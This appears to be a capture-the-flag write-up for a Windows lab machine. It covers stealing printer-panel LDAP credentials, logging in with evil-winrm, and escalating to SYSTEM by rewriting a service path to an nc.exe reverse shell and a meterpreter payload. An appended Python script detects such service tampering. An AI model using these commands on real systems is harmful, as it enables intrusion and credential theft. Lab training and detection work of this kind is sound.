Return

27th May 2021 / Document No D21.101.183

Prepared By: MrR3boot

Machine Author(s): MrR3boot

Difficulty: Easy

Classification: Official

Synopsis
Return is an easy difficulty Windows machine featuring a network printer administration panel that stores
LDAP credentials. These credentials can be captured by pointing the panel at a malicious LDAP server, which
allows obtaining a foothold on the server through the WinRM service. The user is found to be part of a
privileged group, which is further exploited to gain system access.

Skills Required
Basic Windows Knowledge

Beginner Active Directory Knowledge

Skills Learned
Network Printer Abuse

Server Operators Group Abuse

Enumeration
Nmap
Let's start with a port scan.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.233 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sV -sC 10.10.10.233

Nmap output shows that the target is a Windows machine with ports 80 (Internet Information Services), 445
(SMB) and 5985 (Windows Remote Management) available.

SMB
Let's enumerate the SMB service using the enum4linux tool.

This reveals that the host is part of the RETURN domain. SMB does not allow NULL or guest sessions, so we can
turn our attention to the website.

IIS
This reveals a printer admin panel, such as those found on enterprise Canon, Xerox and Epson multifunction
devices. Navigating to Settings reveals a username and domain name.

Foothold
These devices store LDAP and SMB credentials, in order for the printer to query the user list from Active
Directory, and to be able to save scanned files to a user drive. These configuration pages typically allow the
domain controller or file server to be specified. Let's stand up a listener on port 389 (LDAP) and specify our
tun0 IP address in the Server address field.

sudo nc -lvnp 389


A connection is received, and the credentials of svc-printer are revealed. From the port scan we see that the
WinRM port is open. Let's connect to the service using the evil-winrm tool.

gem install evil-winrm


evil-winrm -i 10.10.10.233 -u svc-printer -p '1edFg43012!!'

Privilege Escalation
Enumerating group memberships reveals that svc-printer is part of the Server Operators group.
We can read more about this group here. Members of this group can start/stop system services. Let's
modify a service binary path to obtain a reverse shell.

upload /usr/share/windows-resources/binaries/nc.exe
sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.2 1234"

Stand up a listener on port 1234 and issue the below commands to obtain the reverse shell.

sc.exe stop vss


sc.exe start vss

The above-obtained shell is unstable and might die after a few seconds. A more efficient way would be to
obtain a meterpreter shell and then quickly migrate to a more stable process.

We can use msfvenom to generate a meterpreter reverse shell executable payload file for the Windows
remote host.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=1337 -f exe > shell-x86.exe

Using the current Evil-WinRM shell, the executable can be uploaded on the remote host.

upload shell.exe

Next, we will use the Metasploit console to configure a listener for a reverse shell session on a Windows
target.

msfconsole

Select the multi/handler exploit module, which is used to listen for incoming connections from a
compromised system.

use exploit/multi/handler
Set the payload to windows/meterpreter/reverse_tcp, which allows a reverse TCP connection to be
established between the attacker's machine and the target.

set PAYLOAD windows/meterpreter/reverse_tcp


set LHOST YOUR_IP
set LPORT 1337

Start the listener using the run command.

Using the existing shell, let's modify a service binary path to obtain a reverse shell.

sc.exe config vss binPath="C:\Users\svc-printer\Desktop\shell.exe"


We already have our Metasploit listener running on port 1337, so let us now issue the below commands to
obtain the reverse shell.

sc.exe stop vss


sc.exe start vss

After obtaining a meterpreter session, use the ps command to list the running processes on the remote
box.

Choose an appropriate process which is running as NT AUTHORITY\SYSTEM and migrate to it. In this case,
we will be migrating to the process with PID 3172.

migrate <PID>
We can now spawn a shell and grab the root flag.

shell
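The privilege escalation above works because Server Operators may rewrite a service's binary path, and both variants (the nc.exe one-liner and the meterpreter executable) leave the same trace: the service's ImagePath value is rewritten to point into a user profile. The following detection logic is an added example for the defender side and is not part of the original writeup; it assumes Sysmon Event ID 13 (RegistryEvent, value set) telemetry with Sysmon's standard TargetObject, Details and Image fields, and the sample records are constructed.

```python
"""Flag service ImagePath rewrites like the `sc.exe config vss binPath=...` step above.

Input: constructed Sysmon Event ID 13 (registry value set) records as dicts whose
field names follow Sysmon's schema (EventID, TargetObject, Details, Image).
"""
import re

# Registry location that `sc.exe config <svc> binPath=` ends up writing to
SERVICES_KEY = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.I)
# Directories a legitimate service binary normally lives under
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Tokens that mean a shell is being launched instead of a service binary
SHELL_TOKENS = ("cmd.exe", "powershell", "nc.exe", " -e ")


def classify_image_path(value: str) -> list:
    """Return the reasons a new ImagePath looks suspicious (empty list = benign)."""
    path = value.strip().strip('"').lower()
    reasons = []
    if not path.startswith(TRUSTED_ROOTS):
        reasons.append("binary outside trusted roots")
    if "\\users\\" in path:
        reasons.append("binary in a user profile directory")
    if any(tok in path for tok in SHELL_TOKENS):
        reasons.append("command-shell / netcat tokens in path")
    return reasons


def find_service_tampering(events: list) -> list:
    """Return (service, writing image, reasons) for each EID 13 that rewrites an ImagePath.

    Note: sc.exe config goes through the Service Control Manager, so the registry write
    is typically performed by services.exe; attributing the caller needs extra correlation.
    """
    hits = []
    for ev in events:
        match = SERVICES_KEY.match(ev.get("TargetObject", "")) if ev.get("EventID") == 13 else None
        if match:
            reasons = classify_image_path(ev.get("Details", ""))
            if reasons:
                hits.append((match.group("svc"), ev.get("Image", "?"), reasons))
    return hits


# Constructed sample records, not real telemetry
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\vss\\ImagePath",
     "Details": "C:\\Users\\svc-printer\\Documents\\nc.exe -e cmd.exe 10.10.14.2 1234"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},
]

if __name__ == "__main__":
    for svc, image, reasons in find_service_tampering(SAMPLE_EVENTS):
        print(f"ALERT service={svc} written_by={image}: {'; '.join(reasons)}")
```

Restricting Server Operators membership and alerting on any ImagePath change that lands outside the trusted roots closes both variants shown in this writeup.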
